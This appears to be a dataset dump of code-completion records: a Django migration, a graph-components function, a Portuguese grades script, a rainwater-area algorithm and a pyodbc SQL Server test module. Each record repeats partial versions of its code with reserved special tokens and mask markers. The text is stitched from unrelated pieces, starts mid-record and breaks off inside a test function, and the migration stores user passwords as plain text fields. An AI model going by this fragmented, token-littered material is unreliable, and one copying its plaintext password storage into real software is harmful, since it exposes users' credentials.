"step-5": "# Generated by Django 2.1 on 2018-12-05 00:02\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PleniApp', '0006_auto_20181203_1144'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('body', models.TextField()),\n ('date', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Reply',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('body', models.TextField()),\n ('date', models.DateTimeField(auto_now_add=True)),\n ('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.Comment')),\n ],\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('username', models.CharField(max_length=50)),\n ('password', models.CharField(max_length=50)),\n ('user_type', models.CharField(default='regular', max_length=20)),\n ],\n ),\n migrations.AddField(\n model_name='comment',\n name='user',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.User'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_components(adjacency_matrix):
visited = set()
components = []
for node in range(len(adjacency_matrix)):
if node not in visited:
component = []
build_component(adjacency_matrix, visited, node, component)
components.append(component)
return components
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_components(adjacency_matrix):
visited = set()
components = []
for node in range(len(adjacency_matrix)):
if node not in visited:
component = []
build_component(adjacency_matrix, visited, node, component)
components.append(component)
return components
def build_component(adjacency_matrix, visited, node, component):
visited.add(node)
component.append(node)
for neighbor, value in enumerate(adjacency_matrix[node]):
if value == 1 and neighbor not in visited:
build_component(adjacency_matrix, visited, neighbor, component)
<|reserved_special_token_1|>
"""This module contains an algorithm to find the different
components in a graph represented as an adjacency matrix.
"""
def find_components(adjacency_matrix):
visited = set()
components = []
for node in range(len(adjacency_matrix)):
if node not in visited:
component = []
build_component(adjacency_matrix, visited, node, component)
components.append(component)
return components
def build_component(adjacency_matrix, visited, node, component):
visited.add(node)
component.append(node)
for neighbor, value in enumerate(adjacency_matrix[node]):
if value == 1 and neighbor not in visited:
build_component(adjacency_matrix, visited, neighbor, component)
|
flexible
|
{
"blob_id": "e71a23ef7a065bc4210e55552e19c83c428bc194",
"index": 3187,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_components(adjacency_matrix):\n visited = set()\n components = []\n for node in range(len(adjacency_matrix)):\n if node not in visited:\n component = []\n build_component(adjacency_matrix, visited, node, component)\n components.append(component)\n return components\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef find_components(adjacency_matrix):\n visited = set()\n components = []\n for node in range(len(adjacency_matrix)):\n if node not in visited:\n component = []\n build_component(adjacency_matrix, visited, node, component)\n components.append(component)\n return components\n\n\ndef build_component(adjacency_matrix, visited, node, component):\n visited.add(node)\n component.append(node)\n for neighbor, value in enumerate(adjacency_matrix[node]):\n if value == 1 and neighbor not in visited:\n build_component(adjacency_matrix, visited, neighbor, component)\n",
"step-4": "\"\"\"This module contains an algorithm to find the different\ncomponents in a graph represented as an adjacency matrix.\n\"\"\"\n\n\ndef find_components(adjacency_matrix):\n visited = set()\n components = []\n for node in range(len(adjacency_matrix)):\n if node not in visited:\n component = []\n build_component(adjacency_matrix, visited, node, component)\n components.append(component)\n return components\n\n\ndef build_component(adjacency_matrix, visited, node, component):\n visited.add(node)\n component.append(node)\n for neighbor, value in enumerate(adjacency_matrix[node]):\n if value == 1 and neighbor not in visited:\n build_component(adjacency_matrix, visited, neighbor, component)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
nome = str(input('Nome: '))
nota1 = float(input('Nota 1: '))
nota2 = float(input('Nota 2: '))
media = (nota1 + nota2) / 2
alunos.append([nome, [nota1, nota2], media])
pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]
if pergunta == 'N':
break
print('-=' * 30)
print(f"{'Nº':<4}{'Nome':<10}{'Média':>8}")
print('-' * 30)
for i, v in enumerate(alunos):
print(f'{i:<4}{v[0]:<10}{v[2]:>8}')
while True:
print('-' * 30)
notas_aluno = int(input(
'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))
if notas_aluno == 999:
print('Fim do Boletim.')
break
if notas_aluno <= len(alunos) - 1:
print(
f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'
)
<|reserved_special_token_1|>
alunos = list()
while True:
nome = str(input('Nome: '))
nota1 = float(input('Nota 1: '))
nota2 = float(input('Nota 2: '))
media = (nota1 + nota2) / 2
alunos.append([nome, [nota1, nota2], media])
pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]
if pergunta == 'N':
break
print('-=' * 30)
print(f"{'Nº':<4}{'Nome':<10}{'Média':>8}")
print('-' * 30)
for i, v in enumerate(alunos):
print(f'{i:<4}{v[0]:<10}{v[2]:>8}')
while True:
print('-' * 30)
notas_aluno = int(input(
'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))
if notas_aluno == 999:
print('Fim do Boletim.')
break
if notas_aluno <= len(alunos) - 1:
print(
f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'
)
<|reserved_special_token_1|>
alunos = list()
while True:
nome = str(input('Nome: '))
nota1 = float(input('Nota 1: '))
nota2 = float(input('Nota 2: '))
media = (nota1+nota2)/2
alunos.append([nome, [nota1, nota2], media])
pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]
if pergunta == 'N':
break
print('-=' *30)
print(f'{"Nº":<4}{"Nome":<10}{"Média":>8}')
print('-' *30)
for i, v in enumerate(alunos):
print(f'{i:<4}{v[0]:<10}{v[2]:>8}')
while True:
print('-' *30)
notas_aluno = int(input('Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))
if notas_aluno == 999:
print('Fim do Boletim.')
break
if notas_aluno <= len(alunos)-1:
print(f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}')
|
flexible
|
{
"blob_id": "8dcd4914c58a7ecafdfdd70b698ef3b7141386a6",
"index": 2632,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n nome = str(input('Nome: '))\n nota1 = float(input('Nota 1: '))\n nota2 = float(input('Nota 2: '))\n media = (nota1 + nota2) / 2\n alunos.append([nome, [nota1, nota2], media])\n pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]\n if pergunta == 'N':\n break\nprint('-=' * 30)\nprint(f\"{'Nº':<4}{'Nome':<10}{'Média':>8}\")\nprint('-' * 30)\nfor i, v in enumerate(alunos):\n print(f'{i:<4}{v[0]:<10}{v[2]:>8}')\nwhile True:\n print('-' * 30)\n notas_aluno = int(input(\n 'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))\n if notas_aluno == 999:\n print('Fim do Boletim.')\n break\n if notas_aluno <= len(alunos) - 1:\n print(\n f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'\n )\n",
"step-3": "alunos = list()\nwhile True:\n nome = str(input('Nome: '))\n nota1 = float(input('Nota 1: '))\n nota2 = float(input('Nota 2: '))\n media = (nota1 + nota2) / 2\n alunos.append([nome, [nota1, nota2], media])\n pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]\n if pergunta == 'N':\n break\nprint('-=' * 30)\nprint(f\"{'Nº':<4}{'Nome':<10}{'Média':>8}\")\nprint('-' * 30)\nfor i, v in enumerate(alunos):\n print(f'{i:<4}{v[0]:<10}{v[2]:>8}')\nwhile True:\n print('-' * 30)\n notas_aluno = int(input(\n 'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))\n if notas_aluno == 999:\n print('Fim do Boletim.')\n break\n if notas_aluno <= len(alunos) - 1:\n print(\n f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'\n )\n",
"step-4": "alunos = list()\nwhile True:\n nome = str(input('Nome: '))\n nota1 = float(input('Nota 1: '))\n nota2 = float(input('Nota 2: '))\n media = (nota1+nota2)/2\n alunos.append([nome, [nota1, nota2], media])\n pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]\n if pergunta == 'N':\n break\nprint('-=' *30)\nprint(f'{\"Nº\":<4}{\"Nome\":<10}{\"Média\":>8}')\nprint('-' *30)\nfor i, v in enumerate(alunos): \n print(f'{i:<4}{v[0]:<10}{v[2]:>8}')\nwhile True:\n print('-' *30)\n notas_aluno = int(input('Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))\n if notas_aluno == 999:\n print('Fim do Boletim.')\n break\n if notas_aluno <= len(alunos)-1:\n print(f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#alds13c
from collections import deque
d_stack=deque()
res_stack=deque()
s = input()
for i in range(len(s)):
#print(d_stack,res_stack)
if s[i]=="\\":
d_stack.append(i)
elif s[i]=="/":
if len(d_stack)==0:
continue
left = d_stack.pop()
area = i-left
#res_stack.append((left,area))
if len(res_stack)>0:
flag=True
#merge_candidate = []
mergeareasum=0
while flag:
if len(res_stack)>0 and left<res_stack[-1][0]:
mc = res_stack.pop()
mergeareasum += mc[1]
#res_stack.append((left,under[1]+area))
else:
flag = False
res_stack.append((left,area+mergeareasum))
else:
res_stack.append((left,area))
ans=0
v_devided=[]
for pair in res_stack:
ans += pair[1]
v_devided.append(str(pair[1]))
print(ans)
if len(v_devided)>0:
print(len(v_devided)," ".join(v_devided))
else:
print(0)
|
normal
|
{
"blob_id": "48e3259698788904e000eb15b5443067b0c3e791",
"index": 5968,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\n<mask token>\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-3": "<mask token>\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-4": "from collections import deque\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-5": "#alds13c\nfrom collections import deque\n\nd_stack=deque()\nres_stack=deque()\ns = input()\n\nfor i in range(len(s)):\n #print(d_stack,res_stack)\n if s[i]==\"\\\\\":\n d_stack.append(i)\n elif s[i]==\"/\":\n if len(d_stack)==0:\n continue\n left = d_stack.pop()\n area = i-left\n #res_stack.append((left,area))\n if len(res_stack)>0:\n flag=True\n #merge_candidate = []\n mergeareasum=0\n while flag:\n if len(res_stack)>0 and left<res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n #res_stack.append((left,under[1]+area))\n else:\n flag = False\n res_stack.append((left,area+mergeareasum))\n else:\n res_stack.append((left,area))\n\nans=0\nv_devided=[]\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided)>0:\n print(len(v_devided),\" \".join(v_devided))\nelse:\n print(0)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os, uuid, re, sys
from decimal import Decimal
from datetime import date, time, datetime
from functools import lru_cache
from typing import Iterator
import pyodbc, pytest
# WARNING: Wow Microsoft always manages to do the stupidest thing possible always trying to be
# smarter than everyone. I worked with their APIs for since before "OLE" and it has always
# been a nanny state. They won't read the UID and PWD from odbc.ini because it isn't secure.
# Really? Less secure than what? The next hack someone is going to use. Do the straight
# forward thing and explain how to secure it. it isn't their business how I deploy and secure.
#
# For every other DB we use a single default DSN but you can pass your own via an environment
# variable. For SS, we can't just use a default DSN unless you want to go trusted. (Which is
# more secure? No.) It'll be put into .bashrc most likely. Way to go. Now I'll go rename
# all of the others to DB specific names instead of PYODBC_CNXNSTR. Hot garbage as usual.
CNXNSTR = os.environ.get('PYODBC_SQLSERVER', 'DSN=pyodbc-sqlserver')
def connect(autocommit=False, attrs_before=None):
return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=attrs_before)
DRIVER = connect().getinfo(pyodbc.SQL_DRIVER_NAME)
IS_FREEDTS = bool(re.search('tsodbc', DRIVER, flags=re.IGNORECASE))
IS_MSODBCSQL = bool(re.search(r'(msodbcsql|sqlncli|sqlsrv32\.dll)', DRIVER, re.IGNORECASE))
def _get_sqlserver_year():
"""
Returns the release year of the current version of SQL Server, used to skip tests for
features that are not supported. If the current DB is not SQL Server, 0 is returned.
"""
# We used to use the major version, but most documentation on the web refers to the year
# (e.g. SQL Server 2019) so we'll use that for skipping tests that do not apply.
if not IS_MSODBCSQL:
return 0
cnxn = connect()
cursor = cnxn.cursor()
row = cursor.execute("exec master..xp_msver 'ProductVersion'").fetchone()
major = row.Character_Value.split('.', 1)[0]
return {
# https://sqlserverbuilds.blogspot.com/
'8': 2000, '9': 2005, '10': 2008, '11': 2012, '12': 2014,
'13': 2016, '14': 2017, '15': 2019, '16': 2022
}[major]
SQLSERVER_YEAR = _get_sqlserver_year()
@pytest.fixture()
def cursor() -> Iterator[pyodbc.Cursor]:
cnxn = connect()
cur = cnxn.cursor()
cur.execute("drop table if exists t1")
cur.execute("drop table if exists t2")
cur.execute("drop table if exists t3")
cnxn.commit()
yield cur
if not cnxn.closed:
cur.close()
cnxn.close()
def test_text(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'text')
def test_varchar(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'varchar')
def test_nvarchar(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'nvarchar')
def test_varbinary(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'varbinary')
@pytest.mark.skipif(SQLSERVER_YEAR < 2005, reason='(max) not supported until 2005')
def test_unicode_longmax(cursor: pyodbc.Cursor):
# Issue 188: Segfault when fetching NVARCHAR(MAX) data over 511 bytes
cursor.execute("select cast(replicate(N'x', 512) as nvarchar(max))")
def test_char(cursor: pyodbc.Cursor):
value = "testing"
cursor.execute("create table t1(s char(7))")
cursor.execute("insert into t1 values(?)", "testing")
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def test_int(cursor: pyodbc.Cursor):
_test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])
def test_bigint(cursor: pyodbc.Cursor):
_test_scalar(cursor, 'bigint', [None, -1, 0, 1, 0x123456789, 0x7FFFFFFF, 0xFFFFFFFF,
0x123456789])
def test_overflow_int(cursor: pyodbc.Cursor):
# python allows integers of any size, bigger than an 8 byte int can contain
input = 9999999999999999999999999999999999999
cursor.execute("create table t1(d bigint)")
with pytest.raises(OverflowError):
cursor.execute("insert into t1 values (?)", input)
result = cursor.execute("select * from t1").fetchall()
assert result == []
def test_float(cursor: pyodbc.Cursor):
_test_scalar(cursor, 'float', [None, -200, -1, 0, 1, 1234.5, -200, .00012345])
def test_non_numeric_float(cursor: pyodbc.Cursor):
cursor.execute("create table t1(d float)")
for input in (float('+Infinity'), float('-Infinity'), float('NaN')):
with pytest.raises(pyodbc.ProgrammingError):
cursor.execute("insert into t1 values (?)", input)
def test_drivers():
p = pyodbc.drivers()
assert isinstance(p, list)
def test_datasources():
p = pyodbc.dataSources()
assert isinstance(p, dict)
def test_getinfo_string():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_CATALOG_NAME_SEPARATOR)
assert isinstance(value, str)
def test_getinfo_bool():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)
assert isinstance(value, bool)
def test_getinfo_int():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)
assert isinstance(value, int)
def test_getinfo_smallint():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)
assert isinstance(value, int)
def test_no_fetch(cursor: pyodbc.Cursor):
# Issue 89 with FreeTDS: Multiple selects (or catalog functions that issue selects) without
# fetches seem to confuse the driver.
cursor.execute('select 1')
cursor.execute('select 1')
cursor.execute('select 1')
def test_decode_meta(cursor: pyodbc.Cursor):
"""
Ensure column names with non-ASCII characters are converted using the configured encodings.
"""
# This is from GitHub issue #190
cursor.execute("create table t1(a int)")
cursor.execute("insert into t1 values (1)")
cursor.execute('select a as "Tipología" from t1')
assert cursor.description[0][0] == "Tipología"
def test_exc_integrity(cursor: pyodbc.Cursor):
"Make sure an IntegretyError is raised"
# This is really making sure we are properly encoding and comparing the SQLSTATEs.
cursor.execute("create table t1(s1 varchar(10) primary key)")
cursor.execute("insert into t1 values ('one')")
with pytest.raises(pyodbc.IntegrityError):
cursor.execute("insert into t1 values ('one')")
def test_multiple_bindings(cursor: pyodbc.Cursor):
"More than one bind and select on a cursor"
cursor.execute("create table t1(n int)")
cursor.execute("insert into t1 values (?)", 1)
cursor.execute("insert into t1 values (?)", 2)
cursor.execute("insert into t1 values (?)", 3)
for _ in range(3):
cursor.execute("select n from t1 where n < ?", 10)
cursor.execute("select n from t1 where n < 3")
def test_different_bindings(cursor: pyodbc.Cursor):
cursor.execute("create table t1(n int)")
cursor.execute("create table t2(d datetime)")
cursor.execute("insert into t1 values (?)", 1)
cursor.execute("insert into t2 values (?)", datetime.now())
SMALL_FENCEPOST_SIZES = [None, 0, 1, 255, 256, 510, 511, 512, 1023, 1024, 2047, 2048, 4000]
LARGE_FENCEPOST_SIZES = SMALL_FENCEPOST_SIZES + [4095, 4096, 4097, 10 * 1024, 20 * 1024]
def _test_vartype(cursor: pyodbc.Cursor, datatype):
if datatype == 'text':
lengths = LARGE_FENCEPOST_SIZES
else:
lengths = SMALL_FENCEPOST_SIZES
if datatype == 'text':
cursor.execute(f"create table t1(c1 {datatype})")
else:
maxlen = lengths[-1]
cursor.execute(f"create table t1(c1 {datatype}({maxlen}))")
for length in lengths:
cursor.execute("delete from t1")
encoding = (datatype in ('blob', 'varbinary')) and 'utf8' or None
value = _generate_str(length, encoding=encoding)
try:
cursor.execute("insert into t1 values(?)", value)
except pyodbc.Error as ex:
msg = f'{datatype} insert failed: length={length} len={len(value)}'
raise Exception(msg) from ex
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def _test_scalar(cursor: pyodbc.Cursor, datatype, values):
"""
A simple test wrapper for types that are identical when written and read.
"""
cursor.execute(f"create table t1(c1 {datatype})")
for value in values:
cursor.execute("delete from t1")
cursor.execute("insert into t1 values (?)", value)
v = cursor.execute("select c1 from t1").fetchone()[0]
assert v == value
def test_noscan(cursor: pyodbc.Cursor):
assert cursor.noscan is False
cursor.noscan = True
assert cursor.noscan is True
def test_nonnative_uuid(cursor: pyodbc.Cursor):
# The default is False meaning we should return a string. Note that
# SQL Server seems to always return uppercase.
value = uuid.uuid4()
cursor.execute("create table t1(n uniqueidentifier)")
cursor.execute("insert into t1 values (?)", value)
pyodbc.native_uuid = False
result = cursor.execute("select n from t1").fetchval()
assert isinstance(result, str)
assert result == str(value).upper()
pyodbc.native_uuid = True
def test_native_uuid(cursor: pyodbc.Cursor):
# When true, we should return a uuid.UUID object.
value = uuid.uuid4()
cursor.execute("create table t1(n uniqueidentifier)")
cursor.execute("insert into t1 values (?)", value)
pyodbc.native_uuid = True
result = cursor.execute("select n from t1").fetchval()
assert isinstance(result, uuid.UUID)
assert value == result
def test_nextset(cursor: pyodbc.Cursor):
cursor.execute("create table t1(i int)")
for i in range(4):
cursor.execute("insert into t1(i) values(?)", i)
cursor.execute(
"""
select i from t1 where i < 2 order by i;
select i from t1 where i >= 2 order by i
""")
for i, row in enumerate(cursor):
assert i == row.i
assert cursor.nextset()
for i, row in enumerate(cursor):
assert i + 2 == row.i
@pytest.mark.skipif(IS_FREEDTS, reason='https://github.com/FreeTDS/freetds/issues/230')
def test_nextset_with_raiserror(cursor: pyodbc.Cursor):
cursor.execute("select i = 1; RAISERROR('c', 16, 1);")
row = next(cursor)
assert 1 == row.i
with pytest.raises(pyodbc.ProgrammingError):
cursor.nextset()
def test_fixed_unicode(cursor: pyodbc.Cursor):
value = "t\xebsting"
cursor.execute("create table t1(s nchar(7))")
cursor.execute("insert into t1 values(?)", "t\xebsting")
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert len(v) == len(value)
# If we alloc'd wrong, the test below might work because of an embedded NULL
assert v == value
def test_chinese(cursor: pyodbc.Cursor):
v = '我的'
cursor.execute("SELECT N'我的' AS [Name]")
row = cursor.fetchone()
assert row[0] == v
cursor.execute("SELECT N'我的' AS [Name]")
rows = cursor.fetchall()
assert rows[0][0] == v
def test_bit(cursor: pyodbc.Cursor):
value = True
cursor.execute("create table t1(b bit)")
cursor.execute("insert into t1 values (?)", value)
v = cursor.execute("select b from t1").fetchone()[0]
assert isinstance(v, bool)
assert v == value
def test_decimal(cursor: pyodbc.Cursor):
# From test provided by planders (thanks!) in Issue 91
for (precision, scale, negative) in [
(1, 0, False), (1, 0, True), (6, 0, False), (6, 2, False), (6, 4, True),
(6, 6, True), (38, 0, False), (38, 10, False), (38, 38, False), (38, 0, True),
(38, 10, True), (38, 38, True)]:
try:
cursor.execute("drop table t1")
except:
pass
cursor.execute(f"create table t1(d decimal({precision}, {scale}))")
# Construct a decimal that uses the maximum precision and scale.
sign = negative and '-' or ''
before = '9' * (precision - scale)
after = scale and ('.' + '9' * scale) or ''
decStr = f'{sign}{before}{after}'
value = Decimal(decStr)
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select d from t1").fetchone()[0]
assert v == value
def test_decimal_e(cursor: pyodbc.Cursor):
"""Ensure exponential notation decimals are properly handled"""
value = Decimal((0, (1, 2, 3), 5)) # prints as 1.23E+7
cursor.execute("create table t1(d decimal(10, 2))")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select * from t1").fetchone()[0]
assert result == value
def test_subquery_params(cursor: pyodbc.Cursor):
"""Ensure parameter markers work in a subquery"""
cursor.execute("create table t1(id integer, s varchar(20))")
cursor.execute("insert into t1 values (?,?)", 1, 'test')
row = cursor.execute("""
select x.id
from (
select id
from t1
where s = ?
and id between ? and ?
) x
""", 'test', 1, 10).fetchone()
assert row is not None
assert row[0] == 1
def test_close_cnxn():
"""Make sure using a Cursor after closing its connection doesn't crash."""
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("drop table if exists t1")
cursor.execute("create table t1(id integer, s varchar(20))")
cursor.execute("insert into t1 values (?,?)", 1, 'test')
cursor.execute("select * from t1")
cnxn.close()
# Now that the connection is closed, we expect an exception. (If the code attempts to use
# the HSTMT, we'll get an access violation instead.)
with pytest.raises(pyodbc.ProgrammingError):
cursor.execute("select * from t1")
def test_empty_string(cursor: pyodbc.Cursor):
cursor.execute("create table t1(s varchar(20))")
cursor.execute("insert into t1 values(?)", "")
def test_empty_string_encoding():
cnxn = connect()
cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')
value = ""
cursor = cnxn.cursor()
cursor.execute("create table t1(s varchar(20))")
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def test_fixed_str(cursor: pyodbc.Cursor):
value = "testing"
cursor.execute("create table t1(s char(7))")
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert len(v) == len(value)
# If we alloc'd wrong, the test below might work because of an embedded NULL
assert v == value
def test_empty_unicode(cursor: pyodbc.Cursor):
cursor.execute("create table t1(s nvarchar(20))")
cursor.execute("insert into t1 values(?)", "")
def test_empty_unicode_encoding():
cnxn = connect()
cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')
value = ""
cursor = cnxn.cursor()
cursor.execute("create table t1(s nvarchar(20))")
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def test_negative_row_index(cursor: pyodbc.Cursor):
cursor.execute("create table t1(s varchar(20))")
cursor.execute("insert into t1 values(?)", "1")
row = cursor.execute("select * from t1").fetchone()
assert row[0] == "1"
assert row[-1] == "1"
def test_version():
assert 3 == len(pyodbc.version.split('.')) # 1.3.1 etc.
@pytest.mark.skipif(IS_MSODBCSQL and SQLSERVER_YEAR < 2008,
reason='Date not supported until 2008?')
def test_date(cursor: pyodbc.Cursor):
value = date.today()
cursor.execute("create table t1(d date)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select d from t1").fetchone()[0]
assert isinstance(result, date)
assert value == result
@pytest.mark.skipif(IS_MSODBCSQL and SQLSERVER_YEAR < 2008,
reason='Time not supported until 2008?')
def test_time(cursor: pyodbc.Cursor):
value = datetime.now().time()
# We aren't yet writing values using the new extended time type so the value written to the
# database is only down to the second.
value = value.replace(microsecond=0)
cursor.execute("create table t1(t time)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select t from t1").fetchone()[0]
assert isinstance(result, time)
assert value == result
def test_datetime(cursor: pyodbc.Cursor):
value = datetime(2007, 1, 15, 3, 4, 5)
cursor.execute("create table t1(dt datetime)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert value == result
def test_datetime_fraction(cursor: pyodbc.Cursor):
# SQL Server supports milliseconds, but Python's datetime supports nanoseconds, so the most
# granular datetime supported is xxx000.
value = datetime(2007, 1, 15, 3, 4, 5, 123000)
cursor.execute("create table t1(dt datetime)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert value == result
def test_datetime_fraction_rounded(cursor: pyodbc.Cursor):
# SQL Server supports milliseconds, but Python's datetime supports nanoseconds. pyodbc
# rounds down to what the database supports.
full = datetime(2007, 1, 15, 3, 4, 5, 123456)
rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)
cursor.execute("create table t1(dt datetime)")
cursor.execute("insert into t1 values (?)", full)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert rounded == result
def test_datetime2(cursor: pyodbc.Cursor):
value = datetime(2007, 1, 15, 3, 4, 5)
cursor.execute("create table t1(dt datetime2)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert value == result
def test_sp_results(cursor: pyodbc.Cursor):
cursor.execute(
"""
Create procedure proc1
AS
select top 10 name, id, xtype, refdate
from sysobjects
""")
rows = cursor.execute("exec proc1").fetchall()
assert isinstance(rows, list)
assert len(rows) == 10 # there has to be at least 10 items in sysobjects
assert isinstance(rows[0].refdate, datetime)
def test_sp_results_from_temp(cursor: pyodbc.Cursor):
# Note: I've used "set nocount on" so that we don't get the number of rows deleted from
# #tmptable. If you don't do this, you'd need to call nextset() once to skip it.
cursor.execute(
"""
Create procedure proc1
AS
set nocount on
select top 10 name, id, xtype, refdate
into #tmptable
from sysobjects
select * from #tmptable
""")
cursor.execute("exec proc1")
assert cursor.description is not None
assert len(cursor.description) == 4
rows = cursor.fetchall()
assert isinstance(rows, list)
assert len(rows) == 10 # there has to be at least 10 items in sysobjects
assert isinstance(rows[0].refdate, datetime)
def test_sp_results_from_vartbl(cursor: pyodbc.Cursor):
cursor.execute(
"""
Create procedure proc1
AS
set nocount on
declare @tmptbl table(name varchar(100), id int, xtype varchar(4), refdate datetime)
insert into @tmptbl
select top 10 name, id, xtype, refdate
from sysobjects
select * from @tmptbl
""")
cursor.execute("exec proc1")
rows = cursor.fetchall()
assert isinstance(rows, list)
assert len(rows) == 10 # there has to be at least 10 items in sysobjects
assert isinstance(rows[0].refdate, datetime)
def test_sp_with_dates(cursor: pyodbc.Cursor):
